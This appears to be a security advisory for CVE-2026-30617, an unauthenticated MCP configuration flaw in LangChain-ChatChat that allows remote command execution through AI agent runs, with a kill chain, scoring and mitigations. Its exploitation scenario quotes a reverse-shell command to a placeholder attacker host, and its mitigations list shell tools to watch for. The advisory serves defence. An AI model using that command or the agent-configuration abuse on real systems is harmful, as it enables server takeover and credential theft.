CVE-2026-30617 — HIGH (CVSS 8.6) AI Security Vulnerability

CISO Take

LangChain-ChatChat 0.3.1 exposes an unauthenticated MCP management interface that lets any remote attacker plant arbitrary OS commands into the server configuration. When an AI agent subsequently executes with MCP enabled, those commands run in the service context — no user interaction, no credentials needed. The vulnerability aligns with the broader MCP supply chain attack surface documented by Ox Security across the AI ecosystem, signaling a systemic pattern rather than an isolated bug. There is no public exploit or CISA KEV entry as of publication, but the zero-auth exploitation path and prevalence of internet-exposed LangChain-ChatChat deployments in enterprise AI environments warrant immediate action. Restrict the MCP management interface to localhost or trusted networks now, and upgrade when a patched release is available.

Sources: NVD ATLAS ox.security

Risk Assessment

HIGH risk despite missing CVSS data. The combination of a publicly exposed, unauthenticated management interface with direct command execution via AI agent tool invocation creates a trivial-to-exploit, maximum-impact vector. The MCP STDIO attack pattern is novel — it abuses the AI agent execution pathway rather than traditional application vulnerabilities — meaning existing WAFs and IDS signatures are unlikely to detect exploitation. AI deployments with internet-accessible LangChain-ChatChat instances are critically exposed. Internal-only deployments face lower but non-zero risk from insider threat and lateral movement scenarios.

Attack Kill Chain

Initial Access

Attacker discovers and accesses the publicly exposed, unauthenticated MCP management interface in LangChain-ChatChat with no credentials required.

AML.T0049

Configuration Tampering

Attacker registers a malicious MCP STDIO server entry containing attacker-controlled OS commands and arguments via the unauthenticated management API.

AML.T0081

Triggered Execution

A legitimate user triggers an AI agent task with MCP enabled; the malicious STDIO configuration fires automatically, executing the attacker's commands on the server.

AML.T0053

Impact

Attacker achieves persistent arbitrary command execution within the LangChain-ChatChat service context, establishing a reverse shell and enabling full host compromise, credential theft, and lateral movement.

AML.T0072

Initial Access

Attacker discovers and accesses the publicly exposed, unauthenticated MCP management interface in LangChain-ChatChat with no credentials required.

AML.T0049

Configuration Tampering

Attacker registers a malicious MCP STDIO server entry containing attacker-controlled OS commands and arguments via the unauthenticated management API.

AML.T0081

Triggered Execution

A legitimate user triggers an AI agent task with MCP enabled; the malicious STDIO configuration fires automatically, executing the attacker's commands on the server.

AML.T0053

Impact

Attacker achieves persistent arbitrary command execution within the LangChain-ChatChat service context, establishing a reverse shell and enabling full host compromise, credential theft, and lateral movement.

AML.T0072

Severity & Risk

CVSS 3.1

8.6 / 10

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Trivial

Attack Surface

AV Network

AC Low

PR None

UI None

S Unchanged

C Low

I Low

A High

Recommended Action

6 steps

IMMEDIATE

Firewall or ACL the MCP management interface to localhost or VPN-only — do not expose it to the public internet under any circumstances.
Audit whether MCP is actually required for your deployment; disable it at the application level if not.
Review existing MCP STDIO server configurations for unexpected commands, binaries, or arguments.
Monitor process tree of the LangChain-ChatChat service for anomalous child processes (bash, sh, curl, wget, nc, python spawned from the service).
Upgrade to a patched version as soon as one is released upstream.
Apply container-level seccomp or AppArmor profiles to limit OS-level blast radius from any command execution.

Classification

Code Execution Auth Bypass Supply Chain Agent Framework Plugin AML.T0010.005 - AI Agent Tool AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0053 - AI Agent Tool Invocation AML.T0072 - Reverse Shell AML.T0081 - Modify AI Agent Configuration

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system

ISO 42001

A.8.2 - Information security in AI system development A.9.3 - AI system monitoring and logging

NIST AI RMF

GOVERN 6.2 - Policies and procedures for AI risk management are in place MANAGE 2.4 - Residual risks from AI systems are managed

OWASP LLM Top 10

LLM03:2025 - Supply Chain LLM06:2025 - Excessive Agency

Frequently Asked Questions

What is CVE-2026-30617?

LangChain-ChatChat 0.3.1 exposes an unauthenticated MCP management interface that lets any remote attacker plant arbitrary OS commands into the server configuration. When an AI agent subsequently executes with MCP enabled, those commands run in the service context — no user interaction, no credentials needed. The vulnerability aligns with the broader MCP supply chain attack surface documented by Ox Security across the AI ecosystem, signaling a systemic pattern rather than an isolated bug. There is no public exploit or CISA KEV entry as of publication, but the zero-auth exploitation path and prevalence of internet-exposed LangChain-ChatChat deployments in enterprise AI environments warrant immediate action. Restrict the MCP management interface to localhost or trusted networks now, and upgrade when a patched release is available.

Is CVE-2026-30617 actively exploited?

No confirmed active exploitation of CVE-2026-30617 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-30617?

1. IMMEDIATE: Firewall or ACL the MCP management interface to localhost or VPN-only — do not expose it to the public internet under any circumstances. 2. Audit whether MCP is actually required for your deployment; disable it at the application level if not. 3. Review existing MCP STDIO server configurations for unexpected commands, binaries, or arguments. 4. Monitor process tree of the LangChain-ChatChat service for anomalous child processes (bash, sh, curl, wget, nc, python spawned from the service). 5. Upgrade to a patched version as soon as one is released upstream. 6. Apply container-level seccomp or AppArmor profiles to limit OS-level blast radius from any command execution.

What systems are affected by CVE-2026-30617?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, LLM orchestration layers, MCP-enabled AI pipelines, multi-tool AI agents, RAG pipelines.

What is the CVSS score for CVE-2026-30617?

CVE-2026-30617 has a CVSS v3.1 base score of 8.6 (HIGH).

Technical Details

NVD Description

LangChain-ChatChat 0.3.1 contains a remote code execution vulnerability in its MCP STDIO server configuration and execution handling. A remote attacker can access the publicly exposed MCP management interface and configure an MCP STDIO server with attacker-controlled commands and arguments. When the MCP server is started and MCP is enabled for agent execution, subsequent agent activity triggers execution of arbitrary commands on the server. Successful exploitation allows arbitrary command execution within the context of the LangChain-ChatChat service.

Exploitation Scenario

An attacker scans for internet-facing LangChain-ChatChat instances and identifies the exposed MCP management endpoint. Without credentials, they POST a crafted payload to register a new MCP STDIO server entry pointing to a reverse shell command (e.g., bash -i >& /dev/tcp/attacker.com/4444 0>&1). The configuration persists server-side. When any legitimate user subsequently triggers an AI agent task with MCP enabled, the registered STDIO command fires in the server context, establishing a persistent reverse shell. The attacker exfiltrates database credentials, reads AI model configurations and API keys, and pivots to connected infrastructure — all triggered passively by normal user activity.